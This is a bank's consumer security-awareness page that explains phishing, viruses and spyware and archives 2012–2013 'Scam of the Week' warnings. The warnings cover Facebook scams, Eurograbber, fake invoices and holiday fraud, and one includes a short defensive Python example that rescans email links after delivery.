Online Scam of the Week:

05/07/2013: Fraud-as-a-service 04/09/2013: American Airlines 01/23/2013: Facebook Scams 01/15/2013: MSN/Hotmail Scam
12/011/2012: Eurograbber steals 36 million € 12/04/2012: You Accessed Illegal Content 11/28/2012: Think you can't fall for Phishing? 11/27/2012: Apple Invoices
11/13/2012: Top 10 Holiday Scams 11/07/2012: Stolen Election! 11/06/2012: 20 Notorious Viruses and Botnets 10/31/2012: Is Your Phone Spying On You?
10/30/2012: Friday is Phishing Day 10/15/2012: Romney Almost President 10/10/2012: Lol is this your new profile pic? 10/09/2012: Pay Money to Get Money
10/01/2012: Microsoft Services Agreement 09/25/2012: You Have Been Targeted 09/21/2012: Easy Password/PIN Hacking 09/18/2012: Customer Satisfaction Survey
09/12/2012: Email with "Visual Voicemail" 09/04/2012: AmEx "Security Verification" 08/28/2012: Naked Prince Harry Pictures 08/21/2012: Big Brand Hijacking
08/14/2012: Fake Tech Support 07/31/2012: Olympic Scams 07/24/2012: Online Dating Scams

Security Links

As a result of the open way that the Internet operates, there are individuals that will use it to exploit other computer systems and networks. These threats have become more frequent and increasingly creative in their operations in the past year. The attacks are often extremely harmful to your computer or to your personal confidential information. First Federal Bank makes sure that all of our data systems are secure and reliable, but the connection at the user's end must be just as secure for your information to be safe.

For these reasons, we recommend that you download and install all pertinent security patches for your PC's operating system (Windows) and the PC's internet browser (Internet Explorer, Netscape Communicator, etc.), and maintain an anti-virus program. Popup blockers, spyware removers and firewalls are recommended as well. Some hackers have even started to exploit security flaws in other programs, such as email readers and word processors.

 
What is "Phishing" and "Spoofing"?
 

"Phishing" is a technique used by scammers to gain your confidential information. These people send authentic-looking emails to customers of banks, credit card companies, and even delivery services. This type of email or website imitation is known as "spoofing", and you should not let it fool you. The emails will typically warn that due to recent online threats, the customer needs to visit a website where they can confirm their information. Some spoofers have even been known to include viruses, either as a payload in the message, or as a result of following the included link.

The link in the email redirects the recipient to a website that appears quite valid, usually with copies of the bank logos and often even duplicating the layout of the spoofed bank's website. This causes the user to lower their guard and answer the questions on the website, giving up their credit card numbers, bank account numbers, social security numbers, telephone numbers, addresses, and anything else that the scammer can use in executing identity theft against the recipient.

Be assured that First Federal Bank will NEVER request that you reveal any information in this way. If you receive a message that appears to be from First Federal Bank (or any other company) that asks you to verify personal information, it is a scam. Fortunately, this scheme can only harm you if you do what the scammer wants. Follow these simple steps to protect yourself and your information:

  1. Don't click on the link in the message
  2. Forward a copy of the email to: webmaster@ffbtn.com
  3. Then delete the message, and remove it from your "Deleted Items" folder.
  4. If you have any questions, send an email to: webmaster@ffbtn.com.
 
  • Viruses are programs that reproduce their own code by attaching copies of themselves to other executable files in such a way that the virus code is executed when the infected file is accessed. This self-replicating code, when triggered by some event, may perform a potentially harmful act on your computer. Another way of looking at viruses is to consider them to be programs written to create copies of themselves. Most of the viruses produced in the last several years are spread through email. Once the program finds itself in a system, it looks for the PC's address book, and emails copies of itself to the addresses it finds there. In that way, the person receiving the infected message won't be suspicious, because they recognize the sender's address. Malicious code similar to viruses can also be found in Trojan Horses, worms, and logic bombs.
  • Popups are annoying because they appear on your screen without warning and interrupt your use, but the makers of popup programs often have hidden programs that can download viruses or spyware (see below) onto your PC.
  • Spyware is the name for a category of programs that run in the background of Windows to do work most people are not even aware of. Spyware programs were originally designed to track an internet user's browsing habits, and would transmit a log file of the internet activity back to the programmer's server. Advertisers and companies with commercial websites would use this information to target their future advertising programs. However, they can also affect the performance of your computer, because they tend to monopolize your PC's resources in the background, particularly if there are multiple spyware programs installed and running. They can even put your personal information at serious risk, as newer spyware programs are designed to locate credit card or bank account information stored on your computer's hard drive, then transmit the data back to the hacker's PC. Other spyware programs allow a hacker to remotely control your computer's actions, using it as a server for sending thousands of spam messages or other advertising content. The newest variety of spyware programs targets your installed anti-virus software, disabling the program and making your PC even more vulnerable to the hackers and scammers.
What can be done?
  • Education is the first key. Take a few minutes to understand what the threats are, how they can affect you, and how to protect yourself from them.
  • Don't allow yourself to be fooled or cheated by criminals looking to make an easy buck. When you are out in a public place, you should always be aware of your surroundings and dangers that might exist. The internet should be treated the same way.
  • Follow the recommendations below and keep your protection up-to-date.
  1. Anti-virus programs are an absolute MUST for any internet-connected computer, particularly for systems that send and receive email, as most viruses are delivered via email messages. Anti-virus programs must also be updated to be able to recognize and remove known viruses, including Trojan Horses, worms, and logic bombs. Most anti-virus program companies release updates weekly, and the updates can be downloaded from the company's website, or through one of the links below.
  2. Popup blockers will keep you from being frustrated during your internet browsing, and will cut down the number of spyware programs that will install themselves on your computer's hard drive.
  3. Anti-spyware programs should be used periodically (4-10 times per month is recommended, depending on your usage of the internet) to remove spyware from your PC. Like anti-virus programs, spyware killers must be updated and kept up to date to be able to recognize and remove the most current spyware programs.
  4. Firewalls are particularly useful for always-on broadband internet connections, such as cable modems or DSL. They keep your computer from being accessible to hackers by hiding your computer's internet address from outside of your connection, while still allowing you to browse and retrieve information.

Please feel free to contact us if you have any other questions or concerns about online security. The following links should prove useful in securing your PC:

 
Microsoft Technical Assistance
If you need assistance with online security: webmaster@ffbtn.com











 

Fraud-as-a-service Goes Mainstream

Researchers at RSA stumbled upon a Facebook page that had been up for several months and was marketing the Zeus banking Trojan. This is something new: up to now, this type of marketing was limited to the 'darknet' criminal underground. The Facebook page has been taken down, but Trojans being sold out in the open with 'hints and tips' on how to steal credit cards shows that cybercrime is going mainstream. RSA's Limor Kessem said: "Social networks are such a great place for malware infections and phishing. Why not just market the botnet directly from there?"

Read the full article over at BankInfoSecurity:

 

American Airlines Confirmation

This interesting-looking message appeared in my email Inbox this afternoon:



It looks pretty legitimate, but it's not. There has been a rash of these lately, including emails about UPS delivery problems and automated traffic camera speeding tickets. It still amazes me how many people fall for the scams and follow the links. What they will find is either a link to a website that does a drive-by download of malware to their PC, or less creative scams that simply download the malicious software directly.

Don't do it. Leave the link alone and don't click! Delete those messages immediately, and make sure to clean out the deleted messages folder.

 

Facebook Scams

Facebook is loved far and wide by scammers. It's a great pool of an almost unlimited number of victims, most of whom are gullible enough to fall for the most simple scams. Shooting fish in a barrel! Better yet, a bunch of these Facebook users are "endorsing" the scam, giving it even more credibility. Incredible, isn't it? Most people think of Facebook as this secure, walled garden where nothing bad can happen because Zuck is watching out for you. Think again. There are several different categories of scams out there lying in wait. Many of these are recycled with small updates on a regular basis. Here are the different scam flavors:
  • Account related scams
  • Free stuff from third parties
  • Benefit from (fake) news
  • Curiosity Traps

Facebook changes its look and functionalities often, but a lot of users dislike any kind of change. This normal human tendency is often misused by scammers who offer bogus Facebook Timeline deactivation options. An even greater number of scams targets those who aren't satisfied with features offered by the social network and are tricked into believing that there are ways to add functionalities such as the ability to view who checks out their profile more often, view who has deleted or unfollowed them, to see how many hours they spent on Facebook, to post again their first post, to add a Dislike button, to change their Facebook color theme, and even to add a Facebook security app to guard their accounts or to try a Facebook 2013 Demo app.

Next we have the scams that profess that Facebook is giving out something for free: an official Facebook T-shirt or mug to celebrate the social network's birthday, the random $50,000 reward, free Facebook Credits, or even a free mobile recharge. Lastly, there are scams that try to scare users into doing something because Facebook is closing all accounts, will close theirs because of overpopulation, will start charging users, or the Facebook Security Team will suspend their page. It's also good to know that Facebook-themed scams - and especially phishing attempts and malware-infection attempts - can often come in the form of fake Facebook notification emails: password change notifications, account cancellation (or deactivation) warnings, offensive comment notices, friend requests, and so on.

Facebook has come out with something new, and you always need to watch it when that happens. It's a combination of big data and social networking so that people can easily find new friends, dates, customers or business partners. In short, it's more or less a search engine that allows you to track down Facebook users that meet the criteria you specify. With all that personally relevant data at hand, this new Graph Search function is a bonanza for social engineers, who can now manipulate you even more easily and/or send spear-phishing attacks. This data can be used in a variety of scams. They are currently beta testing and are planning to release it this summer. The only thing I can say is that it is more important than ever to THINK BEFORE YOU CLICK, and get some very good security awareness training. Read the story below about the types of Facebook hacks you (and your employees) need to watch out for.

 

MSN/Hotmail Scam

It's a new year and we'd like to think that users are getting smarter about clicking on phishing links and not falling for recycled tricks by cyber criminals. Unfortunately, there is a new attack this week that's been used before, but people are still falling for it in droves.

The attack is an email that claims to come from the "Windows Live Team" and warns Hotmail/MSN users that their account is at risk of immediate closure after different computers logged into it and multiple attempts were made to guess the password.

The email, which has the subject line "CONFIRMATION ALERT RESET (2013)" and comes from an unofficial-looking @msn.com email address, urges the user to reply via email with their full name, username, password, date of birth, and country in order to confirm their identity.

Alert your friends about this, and continue to warn them they should NEVER give login information to ANYONE.

 

Eurograbber steals 36 million €

If cybercriminals promoted their malware, they would surely call Eurograbber 'next-generation' Zeus crimeware. This is (a lot) more than your run-of-the-mill banking Trojan. These guys have penetrated SMS-based 2-factor authentication and are exploiting it at full speed, Check Point Software Ltd intrusion prevention product manager Darrell Burkey announced. What's most concerning, as per Burkey, is how smartly the criminals engineered this malware. "The attack specifically targeted a certain type of authentication," he stated. The new version has already stolen more than 36 million Euros ($47 million U.S.) from roughly 30,000 accounts at European banks, both consumer and corporate users, performing automatic transfers that varied from €500 to €250,000 to intermediary accounts controlled by members of the gang.

First you have to understand that mobile authentication is used all over Europe for bank transactions, and that U.S. banks are moving in the same direction for some services. The Eurograbber attack first infects a user's PC with a banking Trojan, using social engineering. Next it infects the user's mobile device with a second social engineering trick, when the user is fooled again into clicking on a link that now infects their phone.

When a user with an infected machine visits a banking site, the malware intercepts the session and injects JavaScript into the page. The user is notified of a "security upgrade," which involves providing cell phone information. When the cyberthieves send a confirmation message to the phone, it asks users to click on a link that actually infects the phone.

The malware targets the Android and Blackberry platforms, and has not been spotted on the iPhone yet. The attacks were first reported in Italy, and then bank customers saw the same exploit pop up in Germany, Holland and Spain after the cyber gang had done their translations, testing and quality assurance.

What you may not be aware of is that in Eastern Europe, there are some people that go to work at 9 in the morning, punch the time clock, have lunch, leave the office at five and get health insurance, but what they do during the day is develop and test malware for criminal use. There are several competing criminal software companies out there, trying to outdo each other in creating the most advanced banking trojans.

"This attack meets all the key buzzwords we hear about attacks today," Burkey says during an interview with BankInfoSecurity. "It's sophisticated in the way it goes about taking advantage of two-factor authentication. It's targeted. It's stealthy. And, unfortunately, it's successful." The exploit was first discovered in August by Versafe, an online identity-theft protections provider. The command-and-control servers have been taken down at the moment, but this could easily be repeated.

Now, how can these attacks be prevented? The bad guys go after the weak link in IT security: the human. That means they send well-crafted emails that make people click because they either think they get something for free, or try to prevent a negative consequence. There are thousands of ways that the bad guys can trick someone, and only one way to prevent an attack from happening: security awareness training which will arm both consumers and organizations against increasingly sophisticated malware attacks.

 

You Accessed Illegal Content

There is a significant uptick in a ransomware attack that declares a law enforcement agency has determined that a computer with the victim's IP address has accessed child pornography and other illegal content.

Moreover, this scam uses the good name of the Internet Crime Complaint Center (IC3) to lure the victim to a drive-by download website, which in turn installs the ransomware on the victim's computer, and tries to extort money.

As you well know, cyber criminals use social engineering to make people click on links to 'prevent a negative consequence'. To trick users into clicking, this latest version of the malware claims that the victim's computer activity is being recorded using audio, video, and other devices.

We strongly recommend you warn your friends and co-workers about this one, as they can be hit both in the office and at home.

 

The Huge Damage That ONE Click Can Cause - Please Read!

In August 2012, one malicious email opened by an employee of the South Carolina Department of Revenue caused a massive cyberattack - theft of 3.8 million tax returns, Social Security numbers of 1.9 million people, access to data on 699,900 business tax returns and 3.3 million bank accounts. Attacks like this could have been prevented by training ourselves not to fall for attacks by hackers using phishing emails.

An international hacker sent a few South Carolina Department of Revenue employees a phishing email. Unfortunately, one employee unknowingly clicked on the link. From that one click, the cybercriminal was able to steal the employee's user name and password. For weeks after, the cybercriminal started copying large amounts of information and transferring them onto zip files that were transferred outside of the system.

 

Apple Invoices

As predicted, holiday scams are at an all-time high. Here is the best example: fake Apple invoices being sent in high volume that claim you have been charged for a large purchase from Apple. If you click on these, they lead to the Blackhole exploit kit that drains your bank account. There are some other innovative attacks doing the rounds too:

1) FDIC spamvertising with 'Your activity is discontinued', tricking users into believing that their ability to send Domestic Wire Transfers is disabled

2) Twitter attacks getting more subtle, where you first need to open the mentioned account to get the payload

3) Tsunami spam that 'warns' users and tells them to click on a link to see the video

4) More Twitter scams claiming that Twitter is going to start charging for its up to now free service.

 

Top 10 Holiday Scams

We recommend you mention this to your friends and family as the bad guys are coming out in full force this holiday season and will try to trick and scam users both at the office and at their house.

10 'The Charity Tricksters': The holidays are traditionally the time for giving. It's also the time that cyber criminals try to pry money out of people that mean well. But making donations to the wrong site could mean you are funding cybercrime or even terrorism. So, watch out for any communications from charities that ask for your contribution (phone, email, text, tweets, snail mail and even people ringing your door bell), and make sure they are legit and show their ID. It is safest to only donate to charities you already know, and refuse all the rest.

9 'The Grinch E-Card Greetings': Happy Holidays! Your email has an attachment that looks like an e-greeting card, pretty pictures and all. You think that this must be from a friend. Nope, not so. Malicious e-cards are sent by the millions, and especially at the office, never open these things as they might infect your workstation.

8 'The Fake Gift Card Trick': Internet crooks promote a fake gift card through social media but what they really are after is your information, which they then sell to other cyber criminals who use it for identity theft. Here is an example: A recent Facebook scam offered a "free $1,000 Best Buy gift card" to the first 20,000 people who signed up for a Best Buy fan page, which was a malicious copy of the original.

7 'The Copied Site': Bad guys build complete copies of well-known sites, send you emails promoting great deals, sell products, take the credit card, but never deliver the goods. These sites live only a few days and the money usually goes abroad. Your credit card company will refund the purchase, but apart from not getting your gift(s) your card number is now compromised and will be sold and used by cyber criminals. Always check for the https:// rather than just http:// .

6 'The DM-Scam': You tweet about a holiday gift you are trying to find, and you get a direct message (DM) from another twitter user offering to sell you one. Stop - Look - Think, because this could very well be a sophisticated scam. If you do not know that person, be -very- careful before you continue and never pay up front.

5 'The Extra Holiday-money Fraud': You always need some extra money during this season, so cyber fraudsters are offering work-from-home scams. The most innocent of these make you fill out a form where you give out confidential information like your Social Security number which will get your identity stolen. The worst of them offer you work where you unwittingly launder money from a cyberheist which can get you into major trouble.

4 'The Fake Recession Relief': Internet swindlers target people that are vulnerable due to the recession with pay-in-advance scams and credit offers. Spam emails advertise "prequalified, super low-interest" credit cards and loans if you pay a processing fee, which goes straight into the scammer's pocket.

3 'The Search Term Trap': Bad guys do their research and find out what people want. They then build a site that professes to have the item. They push that site high onto the search engines and you might click on that link. But the site contains malware and will infect your PC. Make sure that your web-browser is fully updated, and will warn you if it sees that the site is unsafe.

2 'The Evil Wi-Fi Twin': You bring your laptop and go to the mall to scout for gifts. Then you check if you get it cheaper somewhere online. But the bad guys are there too, shopping for your credit card number! They put out a Wi-Fi signal that looks just like a free one you always use. Choose the wrong Wi-Fi and the hacker now sits in the middle and steals your credit card data while you buy online. When you use a Wi-Fi connection in a public place, it is better not to use your credit card.

1 'The Black Friday Racket': Black Friday is the start of great holiday shopping deals, unless they are too good to be true and you get tricked into buying an iPad for a 90% discount. Be extra careful with online buying starting the day after Thanksgiving!

 

Stolen Election!

Watch out for a scam wave starting today: Elections. Apart from hurricane Sandy scams, with the race being in a dead heat, you can now expect attacks related to the U.S. elections from today forward. Recently in Venezuela, there were successful phishing attacks using "the election was stolen" as bait.

And as always, the scammers jumped on Hurricane Sandy and started spewing various spam and phishing attacks promising everything from help with insurance claims, disaster relief for people and pets, restaurant deals, gas discount coupons, and even web pages where they can "win" Apple products.

Watch it with these Apple scams, because they ask for a lot of personal information, including your cell phone number, which they can use to initiate premium-rate SMS charges you get billed for. We recommend you forward this warning to your employees.

 

20 Notorious worms, viruses and botnets

  1. The first real computer virus, Creeper was released "in lab" in 1971 by an employee of a company working on building ARPANET, the Internet’s ancestor, according to Guillaume Lovet, Senior Director, FortiGuard Labs. The Creeper looked for a machine on the network, transferred to it, displayed the message “I’m the creeper, catch me if you can!” and started over, thereby hopping from system to system.
  2. Elk Cloner: Written in 1982 "by a 15-year old as a way to booby trap his friends' Apple II computer systems without physical access to them, Elk Cloner spread via floppy disks," according to FortiGuard Labs's Lovet. "Infected machines displayed a harmless poem, dedicated to the virus' glory."
  3. Morris worm: Chris Larsen, Malware Lab Architect for Blue Coat Systems, points to the Morris worm, created in 1988 by Cornell University student Robert Tappan Morris, as the first internet worm. "It's the one that got everyone's attention and demonstrated the possibility of computer malware for causing chaos," adds Kevin Haley, Director, Symantec Security Response.
  4. Michelangelo: The dormant Michelangelo virus was designed to awaken in 1991 on March 6th, the birthday of Renaissance artist Michelangelo, and erase critical parts of infected computers’ hard drives, says Lovet. "The promises of destruction it carried spawned a media frenzy. In the weeks preceding March 6th, media relayed, and some may say amplified, experts’ predictions forecasting 5 million computers going definitively down. Yet, on March 6th, only a few thousand data losses were reported – and public trust in AV companies’ ethics was tainted for a while."
  5. Melissa: The Melissa virus, found in 1999, propagated via infected Microsoft Word documents and mailed itself to Outlook contacts of the contaminated user, explains Lovet. It was virulent enough to paralyze some important mailing systems on the Internet. Its author created the bug to honor Melissa, a stripper he’d met in Florida. "Whether he conquered her heart this way is somewhat unlikely, but one thing is sure: the malicious code earned him 20 months in jail and a $5,000 fine," says Lovet.
  6. I Love You: Discovered in 2000, the "I love you" or "Love Letter" malware was not the first example of using social engineering to infect computers, but it was the first massively successful one, says Haley. Subsequently, it provided a foundation for cyber social engineering that still works today: everyone wants to know that someone loves them. On the flip side, it also taught computer users that they can't trust everything they see online or receive in their inbox. (Though that lesson clearly hasn't settled in fully.)
  7. In 2001, the Anna Kournikova virus spread like wildfire via emails promising a picture of the tennis star. This proved that just like in advertising, when it comes to social engineering, sex sells.
  8. Code Red: In 2001, Code Red infected Web servers, where it automatically spread by exploiting a vulnerability in Microsoft IIS servers, says Lovet. "In less than one week, nearly 400,000 servers were infected, and the homepage of their hosted Websites was replaced with 'Hacked By Chinese!'" Lovet also notes Code Red had a distinguishing feature designed to flood the White House Website with traffic from the infected servers, probably making it the first case of documented hacktivism on a large scale.
  9. SQLslammer made the rounds in 2003. The worm reportedly infected every system vulnerable to the attack within a mere 15 minutes, according to Symantec. It caused a denial of service on some Internet hosts and dramatically slowed down general Internet traffic, spreading rapidly and infecting most of its 75,000 victims within ten minutes. "No one had ever seen malware spread at those speeds before".
  10. In 2004, Sasser malware exploited a vulnerability in Microsoft Windows to propagate, which made it particularly virulent. What’s more, due to a bug in the worm’s code, infected systems turned off every couple of minutes, says Lovet. More than one million systems were infected, AFP’s communications satellites were interrupted for hours, Delta Airlines was forced to cancel flights, the British coast guard had to go back to print maps, and a hospital had to redirect its emergency room because its radiology department was completely paralyzed by the virus. The damage amount was estimated to be more than $18 billion. Microsoft placed a $250,000 bounty on the author’s head, who turned out to be an 18-year old German student.
  11. Mytob: One of the first pieces of malware to combine the features of a bot and a mass-mailer, 2005's MyTob marked the beginning of the era of botnets and of cybercrime. Business models designed to monetize the many botnets began to appear: installation of spyware, dispersal of spam, illegal content hosting, interception of banking credentials, blackmail, etc. Today the revenue generated from botnets (some of which may number 20 million machines) is by some estimates several billion dollars per year.
  12. Storm botnet: By 2007, cybercriminals already had lucrative business models in place. Before then, however, botnets were fairly fragile: By neutralizing its unique Control Center, a botnet could be completely neutralized, because the bots no longer had anyone to report to or take commands from. By implementing a peer-to-peer architecture, Storm became the first botnet with decentralized command. At the peak of the epidemic, Storm had infected up to 50 million systems and accounted for 8 percent of all malware running in the world.
  13. Koobface: (an anagram for Facebook) made headlines in 2008. "It spread by pretending to be the infected user on social networks, prompting friends to download an update to their Flash player in order to view a video. The update is a copy of the virus".
  14. Zeus botnet: Blue Coat Systems points to Zeus, first discovered in 2007, as the "king of the botnet kits." A malware platform unto itself that can be used to create a Trojan horse that steals banking information with man-in-the-browser keystroke logging and form grabbing, Zeus is spread mainly through drive-by downloads and phishing schemes.
  15. "Many people hadn't even heard of 'jailbreaking' a mobile device until the Ikee threat showed up (in 2009)," says Symantec. Affecting Apple's iPhone, the threat was rather harmless in payload, but it caught people's attention and demonstrated a couple of important facts: Mobile devices are simply computers and must be protected from cyber threats just like any other computer and like flies to honey, wherever you have a popular operating system, malware is sure to follow.
  16. Conficker: The massive number of machines infected by Conficker got everyone's attention. The real interesting thing about it, though, and what caused even more fear was the great unknown: What would happen when the resulting botnet woke up on a date specified in the threat's code. Fortunately, it did not live up to people's worst expectations.
  17. Operation Aurora: A cyber attack which began in mid-2009 and continued through December 2009, put the concept of advanced persistent threats on the map, according to researchers at Kaspersky Lab. The attack, first publicly disclosed by Google in a January 12, 2010 blog post, originated in China. The attacks, which hit more than 30 organizations in the U.S., were the first public confirmation that dedicated hackers had infiltrated major organizations and were using advanced techniques to stay undetected for long periods while stealing valuable information, including source code and intellectual property.
  18. The Flashback Trojan, discovered in 2011, affects computers running Mac OS X and exploits a security flaw in Java in order to install itself on Macs. Flashback is a "wake-up call for Mac users; no one should be feeling smug and safe these days."
  19. Stuxnet: Discovered in 2010, Stuxnet exploited several critical vulnerabilities in Windows which until then were unknown, including one guaranteeing its execution when inserting an infected USB key into the target system – even if a system's autorun capabilities were disabled. From the infected system, Stuxnet was then able to spread into an internal network, until it reached its target: an industrial control system manufactured by Siemens. In this particular instance, Stuxnet knew the weak point with a specific controller – and most likely intended to destroy or neutralize the industrial system.
  20. Flame malware: "According to most threat researchers today, only governments have the necessary resources to design and implement a virus of such complexity". Flame mostly targeted computers in the Middle East. Analysis conducted in 2012 of servers used to control the Flame malware found several other related types of malware existed, including a direct connection to Stuxnet. Researchers with Kaspersky Lab, Symantec and others have found Flame is linked to a highly sophisticated operation in which a variety of defensive mechanisms were used to cover the attackers' tracks.
 

Is Your Smartphone Spying On You?

For a few years now, all smartphones sold in the United States have been required to be GPS-trackable, ostensibly for lawful intercept purposes (though there's some vigorous debate from privacy advocates whether that's always the case). That's nothing new. But with a recent rash of ever-deeper-probing apps hitting the streets, could your phone be co-opted in some other way to gather information about you? The answer is yes, but the circumstances vary. If law enforcement agencies get a court order, a more traditional wiretapping scenario can be used whereby access to your conversations is achieved for later use in court if it helps their case. But what about when surveillance wades into legal gray areas: when surveillance techniques and/or software enable you to be spied on without your knowledge? With the meteoric rise in the popularity of smartphones, there has been a correspondingly steep rise in the number of apps that can do nifty things on your mobile device -- things like tune your guitar, find a nearby Italian restaurant, or locate the cheapest gas station near you.

To do many of the things you've grown to appreciate, your apps have access to information, such as your location. They also have access to your contacts (potentially), your usage history, and your always-on network connections. It's no surprise that parents are loading up their kids' smartphones with tracking apps, in case their little cherubs aren't where they say they are, and the grown-ups want a way to check up on them. But very similar technology could be used to check up on you, and you may not necessarily know what it's up to. For instance, a popular app for the Android platform claims to help track wayward spousal activity by tracking down voice conversations, location, and call history -- all tasks previously reserved for private investigators sipping stale coffee while staked out all night outside the target's apartment. Not anymore! Now there's an app for that.

What if you shut off your phone? That's no guarantee you can't be tracked. In years past, the FBI successfully prosecuted a crime boss based on a conversation recorded via his phone when it was “switched off.” The problem is that it's really tough to completely switch some smartphones off -- devilishly tough in some cases. You could pop the battery out, right? Well, on many iPhone and Android models, there really isn't a simple way to do that. And of course there are malicious apps that record your activity, in some cases recording the information you use in financial transactions and then spiriting the information out over the wireless network without you even noticing -- that is, until you get your bank statement a month later and notice strange purchases overseas in locations you've never visited.

I have a friend who refuses to get any modern phones because he's deliberately trying to opt out of mobile devices that have the ability to always know where he is. But, then, he isn't a Twitter junkie either, so it works for him. He says he's going analog in a digital world. Would that work for you? Maybe not, but it's getting increasingly difficult to fit into a technology-driven world and still retain your anonymity. If you want to give it a shot, try limiting the amount of time your network services are enabled to only when you need them. Also, restrict which apps you load to just what you really need. Using the “less is more” approach to apps will help.

It might also be a good idea to install security software that tells you when apps go rogue. Of course, you could always just use a landline phone to call people, but that's just way too old-fashioned for most of us these days.

 

Friday is Phishing Day

Something that was recently discovered is very troubling, and I thought you needed to be alerted about it right away:

Websense reported on October 8, 2012 about their most recent July-August 2012 research. They said: "A disturbing new twist on targeted attacks has started to emerge this year that directly affects professionally managed networks. If we look at the days of the week when most phishing emails are sent, we notice a huge uptick in volume on Fridays, Sundays and Mondays. Most phishing emails are sent on Fridays, followed by Monday and Sunday. The bad guys have learned that they can evade email security measures by sending an email with a clean link on Friday or over the weekend - bypassing email URL scanning. Then, over the weekend they compromise the URL with malicious code. The top phishing days of the week (by percentage) are:

Friday (38.5%)
Monday (30%)
Sunday (10.9%)
Thursday (6.5%)
Tuesday (5.8%)
Wednesday (5.2%)
Saturday (3.2%)

A typical attack of this type would have the bad guy doing the following:

1) Find a URL that can be easily compromised… but do nothing at that time. Leave it 'as is' for now.
2) Craft an email that will not trigger spam, AV or other security measures based on its content, but include links to the currently 'safe' URL. Since they typically pretend to be something legitimate, it is best to simply copy a legitimate message… and only change one link to the 'safe' URL.
3) Send the email over the weekend, or late at night, so email defenses will approve the email and deliver it into the user's mailbox.
4) Just before you believe employees will begin accessing email, compromise the URL and install that part of the attack strategy.

Evasion techniques like these help when hackers are going for the big game - spear-phishing employees with access to a specific network or data or whale phishing, the targeting of executives at companies." The above new tactic shows that it is more important than ever to step all employees through high-quality security awareness training.
What you really should do now is start with our free Phishing Security Test. Find out what percentage of your employees is Phish-prone!
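
The four steps above work against a scanner that checks links only once, at delivery. As an added illustration (not from Websense or from this page's authors), the Python example below tracks links that passed the delivery-time scan and checks them again on a schedule and at click time; the reputation lookup, URL and message id are constructed stand-ins.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Callable, Dict, List

# Hypothetical reputation lookup: (url, time of lookup) -> True if malicious then.
Verdict = Callable[[str, datetime], bool]


@dataclass
class TrackedLink:
    message_id: str
    url: str
    delivered_at: datetime


class LinkRechecker:
    """Keeps links that passed the delivery-time scan and scans them again later."""

    def __init__(self, verdict: Verdict, watch_for: timedelta = timedelta(days=7)):
        self.verdict = verdict
        self.watch_for = watch_for
        self.tracked: List[TrackedLink] = []

    def on_delivery(self, message_id: str, urls: List[str], now: datetime) -> bool:
        """Delivery-time scan: reject if any link is bad now, else deliver and track."""
        if any(self.verdict(u, now) for u in urls):
            return False
        self.tracked += [TrackedLink(message_id, u, now) for u in urls]
        return True

    def recheck(self, now: datetime) -> List[str]:
        """Scheduled re-scan: message ids whose links turned malicious after delivery."""
        self.tracked = [t for t in self.tracked if now - t.delivered_at <= self.watch_for]
        flagged = {t.message_id for t in self.tracked if self.verdict(t.url, now)}
        return sorted(flagged)

    def allow_click(self, url: str, now: datetime) -> bool:
        """Time-of-click check: the verdict that matters is the one at click time."""
        return not self.verdict(url, now)


# Constructed scenario: a link that is clean on Friday and compromised early Monday.
COMPROMISED_AT: Dict[str, datetime] = {
    "http://partner.example/invoice": datetime(2012, 10, 8, 6, 0),  # Monday 06:00
}


def sample_verdict(url: str, when: datetime) -> bool:
    """Stand-in for a URL reputation service, driven by the table above."""
    turned = COMPROMISED_AT.get(url)
    return turned is not None and when >= turned


def run_scenario() -> dict:
    rc = LinkRechecker(sample_verdict)
    url = "http://partner.example/invoice"
    delivered = rc.on_delivery("msg-1", [url], datetime(2012, 10, 5, 18, 0))  # Friday
    return {
        "delivered_friday": delivered,
        "flagged_saturday": rc.recheck(datetime(2012, 10, 6, 12, 0)),
        "flagged_monday": rc.recheck(datetime(2012, 10, 8, 7, 0)),
        "click_monday": rc.allow_click(url, datetime(2012, 10, 8, 9, 0)),
    }


if __name__ == "__main__":
    print(run_scenario())
```

The Friday delivery passes because the link is still clean; only the Monday re-scan and the click-time check see the changed verdict.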

 

Romney Almost President

Remember that special events like elections or natural disasters make the bad guys even more active than normal. (Read 07/31/2012: Olympic Scams)

They use these events to social engineer people into clicking on links they normally would not. Politics is especially charged at the moment, so the new malicious email campaign that pretends to be from CNN is a good example. It announces breaking news about Romney, but it leads to a website with 'blackhole' malware which will infect their workstation.

Be especially wary during and -after- the election, where there will be allegations that "the election was stolen" and cybercrime will use election fraud as bait. I'm sure they are working on a campaign right now that will lie in wait until right after the election. No matter who wins, they will have phishing email ready to trap you. It just happened after the Venezuela elections.

The bad guys are getting more crafty by the month; when you visit the infected website with a hardened PC that is not able to pick up the infections they want to spread, they resort to a page that looks identical to the Adobe Flash Player download and tell you to download it, but it's of course a fake and will install a trojan instead of Flash.

 

Lol is this your new profile pic?

You won't be laughing long if you click on the link that asks: "lol is this your new profile pic?" That's the message being distributed among Skype users, and it conceals malware that can harness your computer to a botnet.

It's a form of phishing, of course, tempting Skype IM users to interact with what appears to be a cheerful and harmless greeting from a friend. The malicious content of the messages was discovered by cloud security vendor Trend Micro, which reported Monday that the malware was "spreading fast."

The payload contained in the message is the charmingly named Dorkbot worm. The symptoms of infection can be "nasty," ranging from locking you out of your computer and demanding a ransom, to stealing user names and passwords for Websites.

Skype has acknowledged the presence of the threat and is working to mitigate its effects. Meantime, it offers advice that should be obvious: "following links -- even when from your contacts -- that look strange or are unexpected is not advisable."

Surely we've all by now received completely uncharacteristic emails from friends who have had one of their accounts hacked. In most cases, these are obvious phishing attempts: Your aunt is unlikely to invite you to "Get a load of this deal." Or maybe she is, but you get my point.

Difficulty arises when neutral messages are received from recognized sources. Whether the Dorkbot IM fits this category depends, I suppose, on whether your friends are accustomed to beginning a sentence with "lol..." It's probably subtle enough to dupe many users, although it's currently unknown how many have fallen victim.

Another day, another threat. With Skype increasingly used as an enterprise tool, there are two takeaways for IT managers: Make sure employees are using the latest version of software like Skype, and reinforce the message that it's hard to automate solutions against phishing. User vigilance is the best defense.

 

Pay Money to Get Money

If You Need to Pay Money to Get Money, You Have Been Scammed. These scams are still very popular. The victim gets an email or text message that they have won a large cash prize. Sometimes they add a PDF with a picture of a fake check, and that they need to pay a small 'processing fee' to get their hands on the full amount.

Often the cybercriminals use the Publishers Clearing House brand for this scam. Since most of us are aware of how the grand prize winner is notified in person with an oversize check, scammers use a ploy that the victim is the runner-up of a smaller cash prize, usually in the $300,000 range. When the victim responds, the scammers' next move is to send a snail mail with an enclosed fake check - usually around $5,000 - with the instructions that the victim should only deposit the check after(!) sending the $2,500 processing fee to an address via Western Union.

